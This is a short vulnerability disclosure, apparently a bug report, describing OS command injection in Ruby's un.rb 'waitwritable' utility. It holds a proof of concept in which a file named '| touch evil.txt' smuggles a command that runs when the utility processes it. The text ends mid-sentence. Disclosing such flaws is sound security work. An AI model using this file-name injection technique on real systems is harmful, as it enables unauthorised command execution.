Ruby: OS Command Injection in '/lib/un.rb -- Utilities to replace common UNIX commands in Makefiles etc'

If the waitwritable command receives a list of files with a command in the name of one of them, it will be executed. PoC bash $ touch |\ touch\ evil.txt $ ls '| touch evil.txt' $ ruby -run -e waitwritable -- -w 1 -v $ ls evil.txt '| touch evil.txt' The vulnerability has the same severity as...